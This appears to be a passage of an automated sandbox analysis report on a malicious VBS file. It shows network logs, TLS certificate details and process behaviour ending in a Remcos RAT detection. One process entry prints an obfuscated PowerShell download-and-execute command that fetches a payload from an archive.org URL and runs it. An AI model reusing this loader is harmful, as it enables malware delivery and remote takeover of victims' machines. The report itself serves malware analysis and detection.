                                                                                                  Apr 21, 2021 15:36:29.115119934 CEST4944853192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:29.184334993 CEST53494488.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:30.695892096 CEST6034253192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:30.747742891 CEST53603428.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:30.818032980 CEST6134653192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:30.891433001 CEST53613468.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:32.356753111 CEST5177453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:32.405339003 CEST53517748.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:34.122384071 CEST5602353192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:34.173491955 CEST53560238.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:37.721982002 CEST5838453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:37.785304070 CEST53583848.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:45.752693892 CEST6026153192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:45.805398941 CEST53602618.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:48.259670019 CEST5606153192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:48.319139004 CEST53560618.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:51.059195042 CEST5833653192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:51.119641066 CEST53583368.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:51.860095978 CEST5378153192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:51.909935951 CEST53537818.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:53.127162933 CEST5406453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:53.184359074 CEST53540648.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:53.914576054 CEST5281153192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:53.980730057 CEST53528118.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.270025015 CEST5529953192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:54.321645021 CEST53552998.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:55.424227953 CEST6374553192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:55.472897053 CEST53637458.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:58.014112949 CEST5005553192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:58.062736988 CEST53500558.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:59.181235075 CEST6137453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:59.238642931 CEST53613748.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:59.826244116 CEST5033953192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:59.886167049 CEST53503398.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.077095985 CEST6330753192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:00.128426075 CEST53633078.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:01.075335979 CEST4969453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:01.129789114 CEST53496948.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:01.888292074 CEST5498253192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:01.939579964 CEST53549828.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:02.444845915 CEST5001053192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:02.504584074 CEST53500108.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:06.512167931 CEST6371853192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:06.573805094 CEST53637188.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:20.601401091 CEST6211653192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:20.663985968 CEST53621168.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:20.764425993 CEST6381653192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:20.826684952 CEST53638168.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:21.894068956 CEST5501453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:21.951316118 CEST53550148.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:23.822206020 CEST6220853192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:23.887178898 CEST53622088.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:24.477293968 CEST5757453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:24.559325933 CEST53575748.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:25.330324888 CEST5181853192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:25.387432098 CEST53518188.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:25.636190891 CEST5662853192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:25.704221010 CEST53566288.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:25.805416107 CEST6077853192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:25.909846067 CEST53607788.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:26.481374979 CEST5379953192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:26.545171022 CEST53537998.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:27.563256025 CEST5468353192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:27.834975004 CEST53546838.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:28.342853069 CEST5932953192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:28.401698112 CEST53593298.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:29.284501076 CEST6402153192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:29.347446918 CEST53640218.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:29.842503071 CEST5612953192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:29.900897980 CEST53561298.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:30.973521948 CEST5817753192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:31.030606031 CEST53581778.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:37:31.595696926 CEST5070053192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:37:31.652832031 CEST53507008.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:38:02.805833101 CEST5406953192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:38:02.865564108 CEST53540698.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:38:03.185791016 CEST6117853192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:38:03.247262955 CEST53611788.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:38:04.195763111 CEST5701753192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:38:04.245568991 CEST53570178.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:38:06.152702093 CEST5632753192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:38:06.216968060 CEST53563278.8.8.8192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Apr 21, 2021 15:36:37.721982002 CEST192.168.2.68.8.8.80xabc7Standard query (0)ia601509.us.archive.orgA (IP address)IN (0x0001)
                                                                                                  Apr 21, 2021 15:36:53.914576054 CEST192.168.2.68.8.8.80x1a10Standard query (0)ia801400.us.archive.orgA (IP address)IN (0x0001)
                                                                                                  Apr 21, 2021 15:36:59.826244116 CEST192.168.2.68.8.8.80x71d0Standard query (0)ia601401.us.archive.orgA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Apr 21, 2021 15:36:37.785304070 CEST8.8.8.8192.168.2.60xabc7No error (0)ia601509.us.archive.org207.241.227.119A (IP address)IN (0x0001)
                                                                                                  Apr 21, 2021 15:36:53.980730057 CEST8.8.8.8192.168.2.60x1a10No error (0)ia801400.us.archive.org207.241.228.140A (IP address)IN (0x0001)
                                                                                                  Apr 21, 2021 15:36:59.886167049 CEST8.8.8.8192.168.2.60x71d0No error (0)ia601401.us.archive.org207.241.227.121A (IP address)IN (0x0001)

                                                                                                  HTTPS Packets

                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                  Apr 21, 2021 15:36:38.218630075 CEST207.241.227.119443192.168.2.649716CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                  Apr 21, 2021 15:36:54.392797947 CEST207.241.228.140443192.168.2.649722CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                  Apr 21, 2021 15:37:00.292644978 CEST207.241.227.121443192.168.2.649727CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Start time:15:36:32
                                                                                                  Start date:21/04/2021
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs'
                                                                                                  Imagebase:0x7ff664360000
                                                                                                  File size:163840 bytes
                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:15:36:33
                                                                                                  Start date:21/04/2021
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                                                                                                  Imagebase:0x7ff743d60000
                                                                                                  File size:447488 bytes
                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:15:36:34
                                                                                                  Start date:21/04/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff61de10000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:15:37:09
                                                                                                  Start date:21/04/2021
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
                                                                                                  Imagebase:0x7ff743d60000
                                                                                                  File size:447488 bytes
                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:15:37:16
                                                                                                  Start date:21/04/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                  Imagebase:0x960000
                                                                                                  File size:55400 bytes
                                                                                                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                                                  Reputation:moderate

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >